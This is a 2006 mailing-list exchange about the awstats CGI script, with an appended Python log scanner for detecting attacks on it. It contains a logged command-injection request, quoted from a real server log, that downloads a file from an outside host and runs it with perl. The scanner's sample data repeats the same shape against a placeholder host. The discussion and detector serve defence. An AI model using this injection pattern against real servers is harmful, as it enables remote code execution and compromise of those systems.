awstats

Aaron Trevena aaron.trevena at gmail.com
Wed Mar 8 09:38:01 GMT 2006


On 08/03/06, Jonathan Stowe <jns at gellyfish.com> wrote:
> On Wed, 2006-03-08 at 08:45, Jonathan McKeown wrote:
> > A 10Kline CGI script, with most variables global and including its own CGI
> > parameter parsing.
>
> I'd say it has a widely known and exploitable flaw:
>
> access.log:64.49.219.174 - - [08/Mar/2005:15:51:21 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20http://64.51.188.10/images/sess_3539283e27d73cae29fe2b80f9293f57;perl%20sess_3539283e27d73cae29fe2b80f9293f57;pwd;echo%20;echo|

Yeah - I see that a lot in my logs, and that is most of the reason I
generate static html every night - that and it's a lot less work for my
poor little virtual server.

A.
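A defender-side check for the request shape quoted in the thread above, added here as an example and not part of the original post or of awstats itself: it parses combined-format access log lines, URL-decodes the configdir parameter of any request to awstats.pl, and flags values that carry shell metacharacters (the quoted entry has a pipe at each end of the value, which is what made the parameter dangerous). The sample log lines, the IP addresses (RFC 5737 documentation ranges) and the payload URL are constructed, modelled on the entry Jonathan posted; the function names are chosen here and are not from awstats.

```python
import re
from urllib.parse import unquote_plus

# Combined/Common Log Format up to the request target; the closing quote and
# HTTP version are left optional so lines cut off after the URL still parse.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)'
)

# Characters that have no business in a directory name handed to a CGI.
SHELL_META = re.compile(r'[|;`$&<>\n]')

# Constructed sample log lines (documentation IP ranges), one modelled on the
# injection attempt quoted in the thread and two ordinary requests.
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Mar/2005:15:51:21 +0000] "GET /cgi-bin/awstats.pl'
    '?configdir=|echo%20;cd%20/tmp;wget%20http://192.0.2.20/x;perl%20x;pwd;'
    'echo%20;echo| HTTP/1.0" 200 512',
    '192.0.2.11 - - [08/Mar/2005:15:52:00 +0000] "GET /cgi-bin/awstats.pl'
    '?configdir=/etc/awstats&config=example.org HTTP/1.1" 200 1234',
    '192.0.2.12 - - [08/Mar/2005:15:53:07 +0000] "GET /stats/awstats.example.org.html'
    ' HTTP/1.1" 200 8873',
]


def parse_log_line(line):
    """Split one access log line into client, time, method and request target."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def query_params(query):
    """Decode a query string into {name: [values]} without relying on
    urllib's parse_qs, whose treatment of ';' changed between Python versions."""
    params = {}
    for pair in query.split('&'):
        if not pair:
            continue
        key, _, value = pair.partition('=')
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def awstats_configdir_finding(line):
    """Return a dict describing a suspicious awstats request, or None."""
    rec = parse_log_line(line)
    if rec is None:
        return None
    path, _, query = rec['target'].partition('?')
    if not path.endswith('/awstats.pl'):
        return None
    for value in query_params(query).get('configdir', []):
        hit = SHELL_META.search(value)
        if hit:
            return {
                'client': rec['client'],
                'time': rec['time'],
                'configdir': value,
                'metachar': hit.group(0),
                # A pipe at either end of the value is the tell-tale shape.
                'pipe_at_edge': value.startswith('|') or value.endswith('|'),
            }
    return None


def scan_log(lines):
    """Run the check over an iterable of log lines and collect the findings."""
    return [f for f in (awstats_configdir_finding(l) for l in lines) if f]


if __name__ == '__main__':
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['time']} {finding['client']} configdir={finding['configdir']!r}")
```

This only spots attempts after the fact in historical logs; the mitigation described in the reply (rendering the reports to static HTML on a schedule and not exposing the CGI at all) removes the exposure rather than detecting it.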